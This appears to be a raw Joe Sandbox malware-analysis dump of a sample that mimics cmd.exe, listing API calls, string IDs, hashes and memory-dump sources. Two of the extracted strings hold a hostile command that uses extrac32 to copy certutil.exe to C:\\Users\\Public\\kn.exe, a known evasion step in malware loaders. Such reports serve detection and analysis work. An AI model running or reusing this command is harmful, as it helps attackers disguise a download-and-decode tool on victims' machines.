                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                      • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 1606811317-2340392073
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                                      • String ID: %04X-%04X$~
                                                                                      • API String ID: 2748242238-2468825380
                                                                                      APIs
                                                                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF793756677
                                                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF79375668F
                                                                                      • _errno.MSVCRT ref: 00007FF7937566A3
                                                                                      • wcstol.MSVCRT ref: 00007FF7937566C4
                                                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF7937566E4
                                                                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF7937566FE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                      • String ID: FAT$~
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D884
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D89D
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D94D
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D964
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79374DB89
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DBDF
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DC63
                                                                                      • memmove.MSVCRT ref: 00007FF79374DD33
                                                                                      • memmove.MSVCRT ref: 00007FF79374DE9A
                                                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374DF1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                      • String ID:
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                        • Part of subcall function 00007FF79375081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79375084E
                                                                                      • towupper.MSVCRT ref: 00007FF79376C1C9
                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376C31C
                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF79376C5CB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                      • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00007FF793757013
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF793757123
                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375706E
                                                                                      • wcsncmp.MSVCRT ref: 00007FF7937570A5
                                                                                      • wcsstr.MSVCRT ref: 00007FF79375F9DB
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375FA00
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375FA5F
                                                                                        • Part of subcall function 00007FF79375823C: FindFirstFileExW.KERNELBASE ref: 00007FF793758280
                                                                                        • Part of subcall function 00007FF79375823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF79375829D
                                                                                        • Part of subcall function 00007FF793753A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79376EAC5,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793753A56
                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375FA3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                      • String ID: \\.\
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                      • String ID:
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937454DE
                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374552B
                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374554F
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79376345F
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79376347E
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634C3
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937634DB
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634FA
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1356649289-0
                                                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction ID: c000d74624fd621b7466c00a574dfc986b737c201593487bc6bb37929b778517
                                                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction Fuzzy Hash: 6B917F21A08A4687F6B4AF31A494179F6E9FB8CB95F844135DA4E537A1DF3CE440CB20
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                      • String ID: %s$/-.$:
                                                                                      • API String ID: 1644023181-879152773
                                                                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                      • Instruction ID: aeac9cb9940b88842d9ce2b53cf5941d8fa69a58116db7f42706ec462fbae9c6
                                                                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                      • Instruction Fuzzy Hash: 1991A721A18A42A1FFB4AB70D4E01B9E2A8FF4879CFC44135D94E626D4DE3CE945C721
                                                                                      APIs
                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793767251), ref: 00007FF79376628E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSingleWait
                                                                                      • String ID: wil
                                                                                      • API String ID: 24740636-1589926490
                                                                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                      • Instruction ID: e98b5bbac58c6f8cdff538bd60884a6c5db85c4bf432beaeb00bd8504224ede2
                                                                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                      • Instruction Fuzzy Hash: 6F416531A0C94287F7B06B32D490279F6A9EF8D799FD48131D90A66BD4CF3DD8448B62
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                      • String ID: $Application$System
                                                                                      • API String ID: 3377411628-1881496484
                                                                                      • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                      • Instruction ID: 1aaa3edf4602bb337c4ea5024d201234578287baf15457a2d6a8d4f4e790f551
                                                                                      • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                      • Instruction Fuzzy Hash: 06414B32B04B429AF7609B70E4903EDB7A9EB8D749F845135DA4E62B58DF38D105C750
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                      • String ID: :$\
                                                                                      • API String ID: 3961617410-1166558509
                                                                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction ID: fa47087e754129d80a86fc7e85d01821bd6395d66f91e657b4b3b4f8eceb8644
                                                                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction Fuzzy Hash: FF216021A0C64287F7F07B70A4C81B9F6A6EB4DB95BC48135D91F92390DF3CE5458A61
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                      • String ID:
                                                                                      • API String ID: 1397130798-0
                                                                                      • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                      • Instruction ID: aa464612050934eb207311529242a3a61eef96acc71bb401d3945ab4316c2b69
                                                                                      • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                      • Instruction Fuzzy Hash: D6919722B0878196FAF9AB2094806B9F3AAFF4CB85FC58135D94E57794DF3CE5408721
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF7937525CA
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF7937525E8
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79375260F
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF793752636
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF793752650
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$Heap$AllocProcess
                                                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                      • API String ID: 3407644289-1668778490
                                                                                      • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                      • Instruction ID: 9b743320406c3be6e4fdd9bef5d785c2b17e32cd3df2790ac0c79416e7035359
                                                                                      • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                      • Instruction Fuzzy Hash: C1314A21A1950285FBF87F31E894379A69CEF8CB81F848036DA0E666A5DE3CE400C731
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      • API String ID: 2516562204-381716982
                                                                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction ID: aa7d0cb0eac1dd73118cf42449474f98e79b04eaa4e146037dd7c3d2932e6f8f
                                                                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction Fuzzy Hash: 5CC1B332A1475186EBA4AF35E88027DB7A9FB48B95F841135DE8E23B94DF3CE451C710
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • iswspace.MSVCRT ref: 00007FF793757EEE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                      • String ID: A
                                                                                      • API String ID: 3731854180-3554254475
                                                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                      • Instruction ID: 874ebc4ca28396149b0c918270e8beb7ce07b2eeef76d3d5ccb9e5e1420987f5
                                                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                      • Instruction Fuzzy Hash: 3AA18E6190DA828AE6B4BB31A4D0279FBA8FF4D795F808135CA4D67794DF3CE441CB21
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                      • API String ID: 1580871199-2613899276
                                                                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction ID: 1921bc16ed3cf21867fa327457d1339c8256a6163ee221cf4e34f866a4cf1b5e
                                                                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction Fuzzy Hash: 9551D671A18B8282EBB09B35E890179B7B8FB8CB85F845135DA5E23744DF3CD501C761
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                      • String ID: con
                                                                                      • API String ID: 689241570-4257191772
                                                                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction ID: 4f2d9c250f1c328cb953fb397fb5bc3b1e5c410440253738f46b4d7f91ead79a
